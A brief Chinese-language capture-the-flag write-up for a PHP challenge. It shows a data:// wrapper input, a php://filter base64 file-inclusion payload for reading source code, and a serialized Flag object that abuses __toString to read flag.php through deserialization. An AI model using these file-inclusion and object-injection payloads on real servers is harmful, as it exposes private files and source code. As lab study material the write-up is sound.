关键点:
(1)file_get_contents($text,'r')
(2)include($file)
(3)$password = unserialize($password);
echo $password;
1.变量如何变成文件输出
text=data://text/plaint,welcome to the zjctf
- include($file)文件包含
file=php://filter/convert.base64-encode/resource=useless.php
3.反序列化
源码
php
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?> 构造
php
<?php
class Flag{
public $file='flag.php';
}
$a=new Flag;
echo serialize($a) ;
?>上面的源码有echo $password,会触发__toString()。